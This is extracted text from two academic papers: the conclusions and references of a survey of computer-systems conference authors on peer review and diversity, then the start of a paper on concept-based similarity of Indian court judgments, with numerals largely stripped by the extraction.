is true when comparing the number of past rejections with the past publications of a paper’s most-experienced author (r = . , p= . ), least-experienced, mean and median experience. we also found no correlation between an author’s experience and their response to the understanding or helpfulness of the reviews. we believe that these negative findings are an overall positive indication that the peer-review process is fair and blind to experience, although a full analysis requires incorporating rejected papers as well. we did find a weak association, however, between authors’ experience and the reviews’ perceived fairness (χ = . , p= . ), which was also observed in the isca community for fairness and helpfulness (jerger et al., ). geographical regions although we did not specifically ask authors for their country of residence, we can infer this information for most authors from their email addresses. we can then aggregate authors based on the region of the world that their email affiliation belongs to and compare the distribution of ratios between survey respondents and all of the authors. table shows these distributions (omitting any authors with unidentifiable country and any regions with two authors or fewer). it is encouraging to see that the two distributions are fairly similar (t =− . , p= . ), which suggests that any selection bias based on geographical region is also limited. unsurprisingly, most of these researchers hail from the west, much more so than in other fields (clarivate analytics, ). one possible explanation is that systems research can require expensive hardware, and is therefore more likely to occur in the well-endowed research institutions and companies of the developed world. regardless of explanation, this data shows a strong dissonance between country population and representation in published systems research, leading in turn to poor geographical diversity. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a final point of interest is to combine all these metrics to look at nnes who migrate to or reside in an english-speaking country. of the respondents with a identifiable email affiliation, reside in the us, and more in the uk, canada, and australia. of the us-based researchers, . % identify as nnes. this group of migrants and visitors exhibits different demographic characteristics than the native us researchers. these migrants show a higher rate of students ( % vs. . %, χ = . , p < . ), which coincides with a lower research experience (median h-index of vs. , t =− . , p < . ), and somewhat higher rate of academic sector affiliation ( . % vs. . %, χ = . , p= . ). these immigrants and visitors, however, exhibit the same gender imbalance as the locals, with a female respondent rate of % vs. . %, χ = . , p= . ). conclusions and future work this paper presented a new survey of conference authors, exposing the experience of authors across a large section of computer systems. we placed a strong emphasis on examining responses across various author demographics and found no selection bias based on the authors’ gender, experience, position, geographical region, or paper. we think these responses are representative of authors of accepted papers throughout the field of systems, and can be used to inform future conference policies, such as double-blind reviews and author rebuttal. the former remains an important research question, and we plan to explore it with our survey data in future work. most survey takers found the opportunity to respond to reviewers valuable, even if it did not change their review grades. the implication for pc chairs, and by extension, educators, may be that while a response process to technical feedback is of little value to experienced practitioners, novices do find it overwhelmingly helpful. students are well represented in this survey, possibly because systems research often requires elaborate implementation efforts, including multiple graduate students. students’ responses to the survey could be useful for conferences with an educational mission to better address this target audience. a related finding is that longer feedback is generally perceived as more helpful, understanding, and fair, which in turn may serve as another factor in improving students’ experience. overall, we found that published authors in systems exhibit a good mix of work sectors, research experience, and english proficiency, but poor diversity across gender and geographical regions. women in particular represent an alarmingly small group of authors in systems research, and this paper looked at whether the peer-review process plays a role in this underrepresentation, as has been found in some grant and job evaluations (lee et al., ). for female authors of accepted papers, we found that their papers tend to have a slightly longer submission history. however, we found little evidence of negative outcomes in the reviews that they received or experience they perceived, even when their identity is known to the reviewers. nonnative english speakers also appear to experience no specific adverse effects from peer review, and in fact often report more positively on their experiences than native speakers. both of these findings can help focus the diversity effort on other policies, at least for accepted authors. the larger question of nativism in peer review requires data on rejected papers, and is not answered in this paper. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in terms of conference policies, the two main qualitative conclusions that we draw from the quantitative results are that from the authors’ perspective, review response or rebuttal can be very valuable, and that short reviews often are not. conference chairs may take these findings into consideration in their review policies, especially if they intend to attract junior researchers. this dataset remains rich for exploration of the many questions that fell outside the scope of this paper, such as the following: • why is the representation of women in systems so low? • do women actually need to receive higher technical scores in their reviews just to be accepted to single-blind conferences? • what are the effects of double-blind reviewing on the quality of reviews, conferences, and papers? • what other publication differences and commonalities exist between systems and the rest of cs? • how do review grades correlate across categories? • how might reviewer load affect our results? • how do any of these factors affect the eventual success of a paper, as measured by awards or citations? we plan to address these questions and others in subsequent research. our hope is that by opening up all of the nonprivate data we collected, we also open the door for other researchers to validate our results, extend them, or collaborate on future studies. acknowledgements this work has been supported by the advice of kelly mcconnville and andrew bray at reed college. we also thank fred douglis, jim fix, anna ritz, and eric roberts for their helpful remarks. additional information and declarations funding this work was supported by a grant from the office of the dean of the faculty at reed college. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: dean of the faculty at reed college. competing interests the authors declare there are no competing interests. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • eitan frachtenberg conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • noah koster performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): this study and the survey questions were approved by the reed college irb (number -s ). data availability the following information was supplied regarding data availability: all the code and data (except confidential survey responses) are available at github: available at http://github.com/eitanf/sysconf. a snapshot of this repository is also available as a supplementary file. additionally, the complete survey questionnaire and anonymized individual survey responses are available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references anderson t. . towards a model of computer systems research. proceedings of the workshop on organizing workshops, conferences, and symposia for computer systems. available at https://www.usenix.org/legacy/event/wowcs /tech/full_papers/ anderson /anderson.pdf. bardi m. . learning the practice of scholarly publication in english–a romanian perspective. english for specific purposes : – doi . /j.esp. . . . beverly r, allman m. . findings and implications from data mining the imc review process. acm sigcomm computer communication review ( ): – doi . / . . ceci sj, williams wm. . understanding current causes of women’s underrepresen- tation in science. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . clarivate analytics. . global state of peer review. available at https://publons.com/ static/publons-global-state-of-peer-review- .pdf. crovella m. . openness of the sigcomm conference. available at http://blog. sigcomm.org/ / /openness_of_the_sigcomm_confer.html. daume h. . some naacl statistics on author response, review quality, etc. natural language processing blog. available at https://nlpers.blogspot.com/ / / some-naacl- -statistics-on-author.html. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://github.com/eitanf/sysconf http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.usenix.org/legacy/event/wowcs /tech/full_papers/anderson /anderson.pdf https://www.usenix.org/legacy/event/wowcs /tech/full_papers/anderson /anderson.pdf http://dx.doi.org/ . /j.esp. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /pnas. https://publons.com/static/publons-global-state-of-peer-review- .pdf https://publons.com/static/publons-global-state-of-peer-review- .pdf http://blog.sigcomm.org/ / /openness_of_the_sigcomm_confer.html http://blog.sigcomm.org/ / /openness_of_the_sigcomm_confer.html https://nlpers.blogspot.com/ / /some-naacl- -statistics-on-author.html https://nlpers.blogspot.com/ / /some-naacl- -statistics-on-author.html http://dx.doi.org/ . /peerj-cs. destefano l. . analysis of micro conference diversity survey results. available at https://www.microarch.org/docs/diversity-survey- .pdf. editage insights. . author perspectives on academic publishing: global survey report . available at https://campaign.editage.com/global_survey_report_ /. elsevier. . gender in the global research landscape. available at https://www.elsevier. com/research-intelligence/campaigns/gender- . ernst e, resch k-l. . reviewer bias: a blinded experimental study. the journal of laboratory and clinical medicine ( ): – . ferguson g, pérez-llantada c, plo r. . english as an international language of scientific publication: a study of attitudes. world englishes ( ): – doi . /j. - x. . .x. flowerdew j. . writing for scholarly publication in english: the case of hong kong. journal of second language writing ( ): – doi . /s - ( ) - . flowerdew j. . attitudes of journal editors to nonnative speaker contributions. tesol quarterly ( ): – doi . / . fortnow l. . time for computer science to grow up. communications of the acm ( ): – . fox mf. . women, men, and engineering. in: fox ma, johnson dg, rosser sv, eds. women, gender, and technology. urbana: university of chicago press, – . frachtenberg e, kaner r. . representation of women in high-performance computing conferences. in: first summit on women in high-performance computing. vancouver: whpc april . franceschet m. . the role of conference publications in cs. communications of the acm ( ): – . françois o. . arbitrariness of peer review: a bayesian analysis of the nips experi- ment. arxiv preprint. arxiv: . . gans js, shepherd gb. . how are the mighty fallen: rejected classic articles by leading economists. journal of economic perspectives ( ): – . hames i. . peer review and manuscript management in scientific journals: guidelines for good practice. oxford, uk: john wiley & sons. hirsch je. . an index to quantify an individual’s scientific research output. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . huang j, gates aj, sinatra r, barabasi a-l. . historical comparison of gender inequality in scientific careers across countries and disciplines. arxiv preprint. arxiv: . . jamieson kh, mcnutt m, kiermer v, sever r. . signaling the trustworthiness of science. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . jerger ne, kaeli d, kozyrakis c, loh g, wenisch t, wood d. . report from the committee to study the isca review process (r ). available at https://docs.google. com/presentation/d/ jzgb qbpihoyqs qm bh t roub rsgi _jkcku/. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.microarch.org/docs/diversity-survey- .pdf https://campaign.editage.com/global_survey_report_ / https://www.elsevier.com/research-intelligence/campaigns/gender- https://www.elsevier.com/research-intelligence/campaigns/gender- http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /pnas. http://arxiv.org/abs/ . http://dx.doi.org/ . /pnas. https://docs.google.com/presentation/d/ jzgb qbpihoyqs qm bh t roub rsgi _jkcku/ https://docs.google.com/presentation/d/ jzgb qbpihoyqs qm bh t roub rsgi _jkcku/ http://dx.doi.org/ . /peerj-cs. karimi f, wagner c, lemmerich f, jadidi m, strohmaier m. . inferring gender from names on the web: a comparative evaluation of gender detection methods. in: proceedings of the th international conference companion on world wide web, www’ companion, international world wide web conferences steering committee. republic and canton of geneva, switzerland, – doi . / . . langford j. . icml acceptance statistics. available at http://hunch.net/?p= . langford j. . representative reviewing. communications of the acm. available at https://cacm.acm.org/blogs/blog-cacm/ -representative-reviewing/fulltext. lawrence n, cortes c. . the nips experiment. available at http://inverseprobability. com/ / / /the-nips-experiment. lee cj, sugimoto cr, zhang g, cronin b. . bias in peer review. journal of the american society for information science and technology ( ): – doi . /asi. . mahoney mj. . publication prejudices: an experimental study of confirmatory bias in the peer review system. cognitive therapy and research ( ): – doi . /bf . mainguy g, motamedi mr, mietchen d. . peer review–the newcomers’ perspective. plos biology ( ):e doi . /journal.pbio. . mattauch s, lohmann k, hannig f, lohmann d, teich j. . a bibliometric approach for detecting the gender gap in computer science. communications of the acm : – doi . / . mcnutt ra, evans at, fletcher rh, fletcher sw. . the effects of blinding on the quality of peer review: a randomized trial. jama ( ): – doi . /jama. . . murray d, siler k, lariviére v, chan wm, collings am, raymond j, sugimoto cr. . gender and international diversity improves equity in peer review. biorxiv . papagiannaki k. . author feedback experiment at pam . acm sigcomm computer communication review ( ): – . parno b, erlingsson u, enck w. . report on the ieee s&p submission and review process and its experiments. available at http://www.ieee-security.org/tc/ reports/ /sp -pcchairreport.pdf. rozycki w, johnson nh. . non-canonical grammar in best paper award winners in engineering. english for specific purposes ( ): – doi . /j.esp. . . . sense about science. . quality, trust & peer review: researchers’ perspectives years on. available at https://senseaboutscience.org/wp-content/uploads/ / /quality- trust-peer-review.pdf. shah nb, tabibian b, muandet k, guyon i, von luxburg u. . design and anal- ysis of the nips review process. the journal of machine learning research ( ): – . solomon dj. . a survey of authors publishing in four megajournals. peerj :e doi . /peerj. . frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://hunch.net/?p= https://cacm.acm.org/blogs/blog-cacm/ -representative-reviewing/fulltext http://inverseprobability.com/ / / /the-nips-experiment http://inverseprobability.com/ / / /the-nips-experiment http://dx.doi.org/ . /asi. http://dx.doi.org/ . /bf http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . / http://dx.doi.org/ . /jama. . http://www.ieee-security.org/tc/reports/ /sp -pcchairreport.pdf http://www.ieee-security.org/tc/reports/ /sp -pcchairreport.pdf http://dx.doi.org/ . /j.esp. . . https://senseaboutscience.org/wp-content/uploads/ / /quality-trust-peer-review.pdf https://senseaboutscience.org/wp-content/uploads/ / /quality-trust-peer-review.pdf http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. tomkins a, zhang m, heavlin wd. . reviewer bias in single-versus double-blind peer review. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . vardi my. . conferences vs. journals in computing research. communications of the acm ( ): – . vines t. . is peer review a coin toss? the scholarly kitchen. available at https:// scholarlykitchen.sspnet.org/ / / /is-peer-review-a-coin-toss/. wallach ds. . rebooting the cs publication process. communications of the acm ( ): – . wang ll, stanovsky g, weihs l, etzioni o. . gender trends in computer science authorship. arxiv preprint. arxiv: . . frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. https://scholarlykitchen.sspnet.org/ / / /is-peer-review-a-coin-toss/ https://scholarlykitchen.sspnet.org/ / / /is-peer-review-a-coin-toss/ http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. submitted may accepted february published march corresponding author rupali s. wagh, rupali.wagh@christuniversity.in academic editor fabrizio sebastiani additional information and declarations can be found on page doi . /peerj-cs. copyright wagh and anand distributed under creative commons cc-by . open access legal document similarity: a multi- criteria decision-making perspective rupali s. wagh ,* and deepa anand ,* department of computer science, jain deemed to be university, bangalore, karnataka, india department of information science and engineering, cmr institute of technology, bangalore, karnataka, india * these authors contributed equally to this work. abstract the vast volume of documents available in legal databases demands effective infor- mation retrieval approaches which take into consideration the intricacies of the legal domain. relevant document retrieval is the backbone of the legal domain. the concept of relevance in the legal domain is very complex and multi-faceted. in this work, we propose a novel approach of concept based similarity estimation among court judgments. we use a graph-based method, to identify prominent concepts present in a judgment and extract sentences representative of these concepts. the sentences and concepts so mined are used to express/visualize likeness among concepts between a pair of documents from different perspectives. we also propose to aggregate the different levels of matching so obtained into one measure quantifying the level of similarity between a judgment pair. we employ the ordered weighted average (owa) family of aggregation operators for obtaining the similarity value. the experimental results suggest that the proposed approach of concept based similarity is effective in the extraction of relevant legal documents and performs better than other competing techniques. additionally, the proposed two-level abstraction of similarity enables informative visualization for deeper insights into case relevance. subjects artificial intelligence, computational linguistics, data science, digital libraries keywords legal information retrieval, concept based similarity, multi-dimensional similarity, owa, concept interaction graph introduction easy availability of legal information resources through online legal databases has provided much-required acceleration to the research in the domain of legal information retrieval (lir). lir aims at retrieving legal information objects relevant to a user’s query. legal information objects are various documents like court transcripts, verdicts, legislation documents, and judgments that are generated during the course of a legal process. these documents are primary resources for the interpretations of the law of any judiciary and hence are required by a legal professional for decision making as well as argumentation. specific characteristics of legal documents like document size, document internal structure, temporal properties, specific legal terminology, polysemy, and heterogeneity make lir different extremely complex as compared to other domains. since every legal document presents one or more legal issue, the legal domain demands how to cite this article wagh rs, anand d. . legal document similarity: a multi-criteria decision-making perspective. peerj com- put. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:rupali.wagh@christuniversity.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. context based document retrieval than just data based retrieval. contextualization of a legal issue is a non-trivial task due to the inherent complexities of this domain. additionally, the concept of ‘‘match’’ or ‘‘relevance’’ is multi-dimensional in the legal domain (van opijnen, ). lir is thus a very challenging research field as the domain necessitates for very generic to a very specific abstraction of a legal document at the same time. retrieving relevant legal document from a huge collection of resources requires a deep understanding of the notion of relevance in this domain and intelligent methods for identification and representation of legal concepts for establishing relevance. finding similarity among legal documents, specifically among court judgments is one of the most studied problems under lir. methods and techniques used in lir originate from confluence of four major technologies: namely artificial intelligence (ai), network analysis, machine learning and nlp (bench-capon et al., ). legal knowledge is very complex and is available in various documents written in natural languages. ontology, a branch of ai, is widely used to facilitate effective knowledge management in the legal domain (saravanan, ravindran & raman, ). knowledge engineering using semantic web and ontology for specific sub-domains of law is practiced popularly (casanovas et al., ) due to the ease of modeling legal actors, agents, and relationships using these technologies. with the advents in other technological domains, legal ontological solutions are also upgraded to incorporate more scalable, re-usable, context-aware and user- centered approaches in the existing framework. citations or bibliographical relevance in the legal domain is extremely important for understanding the interpretations and applications of law and a network is the most obvious representation of data for legal citation analysis. thus, citation network analysis explicably remains one of the very popular techniques in lir. earlier approaches predominantly use network degree statistics and structural properties for extraction of relevant documents in the legal domain (van opijnen, ; koniaris, anagnostopoulos & vassiliou, ). approaches which use centrality and between-ness of a node in a case citation network (wagh & anand, ) to find similarity among indian court judgments are proposed. but, with the recent advancements in deep learning based graph embedding models (cui et al., ), graph and all its components can be represented as dense feature vectors enabling exploration of newer models in network analysis for lir. (sugathadasa et al., ) use node embeddings obtained using node vec algorithm (goyal & ferrara, ; grover & leskovec, ) for case citation data for finding similar legal documents. analysis of case citation data using machine learning methods to estimate similarity among cases has also been experimented in the past. coupling of bibliographic information with text in the paragraph of judgments (kumar et al., ) for estimation of similarity between two judgments is proposed. exploring relatedness among cases by finding common citations is proposed (nair & wagh, ) where authors present application of association rule mining to estimate similarity value. while citation based similarity among court cases is undoubtedly of very high significance in legal domain, the case citations graphs are generally very sparse (mandal et al., a; mandal et al., b). moreover, semantic relationships among the case judgments and their interpretation are implicitly available as text within a judgment document. natural language processing (nlp), along with wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. machine learning methods are used to establish semantic relevance of textual contents present in the documents (branting, ). until recently, vector space model and latent semantic indexing, lsi with its variants were used largely for semantic representation of text. with the emergence of word/document embeddings, information retrieval is now shifted to neural information retrieval (onal et al., ). dense vector representations of word and document obtained using deep learning based models are used as input for machine learning algorithms. the strength of these models lies in capturing the semantics of text and thereby recognizing document similarities without exact word-match. many studies highlight the effectiveness of neural embedding for text mandal et al. ( a), mandal et al. ( b) and vo, privault & guillot ( ) for legal information retrieval. finding relevant precedents (judgments) is one of the most widely studied problems in lir. a court judgment is a complex document with various sections describing the application of law to the legal issues discussed during the case proceedings. there is a general agreement on the need for concept-based document retrieval in legal domain, and the approaches for lir largely focus on obtaining a single representation of document covering all legal concepts present in the document which results in single similarity value. one of the major limitations of these approaches is the inability to provide interpretations of relevance for in-depth understanding. while a single numeric value for measuring relevance is undoubtedly of very high significance in information retrieval, user satis- faction in an ir system also depends on intuitively informative results provided by the system. there are studies (koniaris, anagnostopoulos & vassiliou, ) emphasizing on the need for going beyond a single homogeneous similarity value for more effective legal information retrieval. in this proposed work, we present the legal document similarity estimation as a multi-criteria decision-making (mcdm) problem. we specifically focus on the problem of finding the similarity among court judgments for the indian supreme court judgment corpus. we extract prominent concepts which are considered as criteria and extract representative sentences for each of the criteria. using these sentences, we then generate a concept similarity matrix for the concepts extracted from the documents. every value in the similarity matrix represents weight for the criterion and final similarity value is calculated using the ordered weighted average (owa) operator. thus, the approach provides two abstractions of relevance between a judgment pair: ( ) at the concept level as a matrix of similarity values; ( ) at the document level as single similarity value obtained by aggregating concept level similarity. experimental results demonstrate the effectiveness of our proposed approach for the extraction of relevant judgments. in addition to the enhanced performance of relevant judgment retrieval, this approach enables informative visualization of results that provide deeper insights into the relevance obtained. the remainder of the paper is organized as follows; the next section, ‘materials and methods’, elaborates the steps of the proposed approach in detail. the section ‘experimental evaluation’ discusses the experimental set-up and provides the details on the data set and implementation framework used in the proposed work. we present results and discussion on obtained results in the ‘results and discussion’ section where we compare the results with existing work in lir for indian legal system. we further wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. highlight the effectiveness of our work. we conclude with a note on the future direction for the proposed work in the ‘conclusion’ section. materials & methods semantic matching of documents is the most fundamental activity of lir. generically, textual units of different granularity viz. words, phrases, sentences, paragraphs and even complete documents are used for establishing semantic relevance between user’s query and documents. embeddings are obtained by considering word neighborhood as the context, and hence capture the semantics of text even without exact word match. these methods are very effective and popular for all nlp tasks across the domains (onal et al., ). one of the limitations of deep learning based vector embedding as highlighted in (moody, ) is the inability to provide interpretative insights. judgment documents are complex and lengthy. the estimation of similarities among long documents requires a different approach as the similarity has to be modeled as a function of the concepts present in the documents (liu et al., ). moreover, since the concepts may be scattered throughout the body of the text in a document, a well-defined approach for identification of concepts is required. in this paper, we propose a three-step approach for finding con- cept based similarity among court judgments: (i) identification of main concepts/topics of the document (ii) extraction of the text under every concept (iii) similarity calculation using suitable measure. these steps are explained in detail in the following sub-sections. identification of basic concept words natural language processing (nlp) offers a wide range of methods and approaches for the identification of topics from a document. traditional tf-idf based vector space model and latent dirichlet allocation (lda) use the distribution of words (moody, ) in the document to extract topics. these methods do not consider word neighborhood and are based on exact word match. graph-based extraction of topics is another popular approach (ying et al., and sayyadi & raschid, ) for identifying the broad themes in documents. these methods are based on establishing a relationship between words/concepts using estimates such as co-occurrence, semantic similarity, etc. for extraction of prominent topics in a document. variants of the above two approaches are popularly used for topic identification and available as off-the-shelf tools for identifying prominent words in the document. we propose employing a variation of the graph-based method for identifying topics and utilizing it to obtain important segments of the judgment. let l={l ,l ...,ln}be the set of ‘n’ legal judgments in the corpus. let n(li) be the set of sentences in the legal document li and let lij be the ‘j’th sentence of the ‘i’th legal judgment document. as the first step in the pre-processing of documents, we construct the base concept words as the nouns present in sentences in the judgment. liu et al. ( ) propose extraction of keywords as basic concepts where authors demonstrate similarity estimation for news reports using concept interaction graph. specific and distinctive characteristics of legal documents require a domain-specific approach for the extraction of concepts from the documents. while a person’s name may have a lot of relevance in a news report, it just wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. represents a party (respondent or appellant) or a participant in the case and does not actually contribute to any legal concept present in the judgment. therefore, we ignore references to specific people, place etc. which appear as proper nouns from the input in the document, and we define base word concept set of the ‘j’th sentence in the ‘i’th document, b ( lij ) , as: b ( lij ) = { x ∈lij ∣∣pos(x)= ′commonnoun′and x ∈=(lij) ( ) here pos(x)stands for part of speech of the word x and=(lij) represents the important words in the sentence lij. we consider a common noun appearing in the sentences as concepts and construct a concept interaction graph using concept co-occurrences. however, we are selective about the nouns appearing in the concept graph and only allow important nouns to represent the document fragments. tf-idf, term frequency- inverse document frequency method is the most fundamental weighing scheme used in an information retrieval system. tf-idf computes weight for a term in a document collection by assessing its local relevance using term frequency within the document (tf) and global relevance by computing inverse document frequency for the entire document collection (ramos, ). to assess this importance of the nouns we use tf-idf model constructed for individual judgment by considering every sentence in a judgment as a separate document. the judgment, therefore, can be deemed to be a collection of documents (lij,j� ...n(li)). therefore= ( lij ) can be determined as: = ( lij ) = { x ∈lij ∣∣tf (x,lij)×idf (x,li)> mean k�[ ,n(li)] (tf (x,lik)×idf (x,li)) ( ) where tf (x,lij) is the term frequency of the word ‘x’ in the sentence lij, idf (x,li) measures the uniqueness of ‘x’ across the document li and the words having tf-idf above the mean tf-idf score over the document are considered important. identification of main concepts/topics of the document detection of related words in the judgment document is an important step and this is assessed based on the proximity of the base concept words. a concept graph gi = (vi,ei) of a legal document li, is constructed using the base concept words s.t. vi =⋃ j∈[ ,n(li)]b ( lij ) and ei = {( x,y ) |co−occurrence ( s,y ) > } . the set of vertices vi is the set of all base concept words across all sentences in the document and two concept words nodes in the graph have an edge between them if their co-occurrence count is above i.e., they appear together in at least three of the sentences. we use the count of co-occurrences as the strength of association between two concepts words. less than co-occurrences of concept words may represent mere coincidence and hence we do not deem such associations as strong enough for addition of edge in the graph. figure shows a concept graph constructed from a document fragment. to discover important topics in the document we employ louvain modularity com- munity detection algorithm (de meo, ). the algorithm tries to locate communities by trying to maximize the modularity i.e., the ratio of the density of edges inside each community to the density of edges to nodes outside the community. the algorithm runs iteratively by first identifying small communities with high modularity and then proceeds wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure sample concept graph for a judgment document fragment. full-size doi: . /peerjcs. /fig- to enlarge the communities by grouping them to achieve the maximum increase in mod- ularity. we use the best partition method in the python networkx module, for detecting concepts in the document (community detection for networkx’s documentation, ). figure shows an example of communities so evolved for a pair of judgments. let mi be the number of communities learnt for the document li and let the communities so detected be ci ,ci ,...,cimi. each community thus identified is considered as a prominent concept which is represented by a set of words that formed the nodes in the initial concept graph. representative sentence selection and similarity estimation once the main concepts, represented as word communities, in the document are identified, for each concept the top five, most representative sentences for that concept are selected. tf-idf scoring is used for this purpose. each concept cij, is a collection of words and can be considered as a document, similar to how each sentence in li is considered a document (eq. ( )). cosine similarity is computed between vectors representing each sentence in the judgment with the vector representing the concept. the five most similar sentences to the concept cij are chosen as sentences representing that concept in the judgment li. our aim is to construct a vector representation of each concept occurring in a legal judgment which can capture the degree of occurrence of various ideas. these vector representations of concepts can ease the computation of similarity between two judgment documents. let skij be the kth representative sentence for the ‘j’th concept in ‘i’th legal document. the vector representation of each concept can be derived in various ways, the simplest one, being averaging the tf-idf scores of skij,k ∈[ , ] i.e., averaging the tf- idf scores for all sentences representative of a concept. however, we leverage on recent advances in neural networks, to take advantage of the potential knowledge captured by word embeddings. word embeddings convert each word into a multi-dimensional vector of features in such a way that the vector representation of related words has high wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure communities derived from a judgment document. full-size doi: . /peerjcs. /fig- similarity. word embeddings are often trained on huge real-world datasets and thus are able to capture the semantics very effectively. in addition, word embeddings obtained through popular methods like word vec (mikolov et al., ) have the property of additive compositionality i.e., the ability of the sum of word vectors of words composing a sentence/paragraph to preserve the semantics contained therein. studies indicate that a word representation obtained using a combination of neural embeddings and tf-idf provides is more effective (lau & baldwin, ) than the just the vector representations in many nlp tasks. hence, we use idf value for every word as weight applied to the vector of the word obtained using word vec. we compute the vector wij corresponding to each concept cij using two methods namely word vec and idf weighted word vec and resultant vectors for these methods are computed using eqs. ( ) and ( ) respectively. wij = ∑ k= ∑ x∈skij word vec(x) ( ) and wij = ∑ k= ∑ x∈skij word vec(x)∗idf(x) ( ) here the summation involves vector addition of the word vectors of words belonging to each of the five representative sentences for the concept cij. the above-computed vector representation for each concept present in the judgment is finally used to compute the similarity between judgment documents. the notion of wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. similarity among documents, sometimes, may not be sufficiently captured by single similarity value. two documents may be similar to each other to different degrees when observed using different viewpoints. as an example, two legal documents may be similar because of commonalities in the case history but may be different in the way the cases were argued. on the other hand, two other legal documents may have nothing common in terms of the facts of the case but both may be overturning the judgment made by a lower court. to that extent, the two cases can be considered similar. when similarity computation is employed for judging the closeness of two documents, the context of the search may be unknown. in such cases estimating similarities using different notions and visualizing the same may be more helpful to the user than obtaining a single similarity score. the ability to derive multiple vector representations for various concepts contained in a legal document in this proposed approach could aid in finding different levels of similarity between a pair of legal documents. let la and lb be two legal judgments consisting of na and nb concepts respectively. we compute the similarity between each pair of concepts in la and lb. let sim(cai,cbj) be the similarity between the ‘i’th and the ‘j’th concepts of the documents la and lb, respectively. in this way, we obtain na×nb similarity values. we use these similarity values to establish links between concepts across the two documents. for the proposed approach, we only allow each concept to participate in a maximum of one link. modifications to this restriction are always possible and could possibly result in different similarity links and visualization result. the concepts in the two documents having the highest similarity value are linked using a similarity link. the documents which have already been linked are removed from further linking. this process is repeated taking the next two concepts one from each of the documents which are most similar and so on. the linking of highest matching concepts between a pair of judgments would be referred to as concept matches and an example of such a concept match is illustrated in fig. . it is to be noted that in figs. and only the concept words are shown (rather than the representative sentences) for ease of understanding. the strength of the lines connecting various concepts across the judgments are indicators of the level of match between the concepts. we present the following two examples to support the above explanation and to demonstrate how the proposed method is able to facilitate multi-level concept matching and visualization. example : a judgment pair discusses accident as a common theme but the facts in individual case result in multiple communities. whereas there is a high similarity match in the discussion about the accident incident itself (concept in both judgments - shown as a bold link between the two), there is little match in concept of the pair, the first talks about charges of homicide whereas the second talks about negotiating the amount of compensation for the dependents of the deceased. example : a judgment pair with discussion on intellectual property rights (ipr) and copyright. the two cases present different dimensions of ipr. case discusses ipr with respect to copyright of literary work whereas case discusses copyright on customer database as a business secret. concept and concept for the pair have a high likeness since these statements talk about property rights and infringement in general; the wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure concept based similarity—examples showing a substantial match through one concept but negligible match in another. (a) concepts derived from accident related cases. (b) concepts derived from copyright related cases. full-size doi: . /peerjcs. /fig- other two concepts in the judgments discuss copyright w.r.t. books while in the second judgment the unmatched concept discusses copyright on a database, trade, etc. example visualization for the above two situations is shown in fig. a and fig. b respectively. it is to be noted that the colors of the concept nodes are representative of the degree of closeness of the concepts. the different levels of similarity so obtained can also be aggregated to compute a single similarity value which could be useful for finding all relevant documents to a given judgment. given the various similarity values viewed from different perspectives between two judgments, we employ the ordered weight averaging operator for aggregating the various similarity values into one. owa is a family of aggregation operators introduced by yager ( ) has a special application for multi-attribute decision-making problem especially in the presence of fuzzy data and allows for the incorporation of linguistic cri- teria for aggregation. specifically, if there are items in a domain that need to be evaluated according to ‘p’ criteria ( t ,t ,...,tp ) s.t. tj(item) is the extent to which ‘item’ satisfies wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the ‘j’th criterion, then it is possible to use the family of owa aggregation operators to evaluate the degree to which ‘item’ satisfies ‘‘some criteria’’, ‘‘all criteria’’, ‘‘most criteria’’ etc. in the case of similarity estimation in the present case, we can consider the pair of 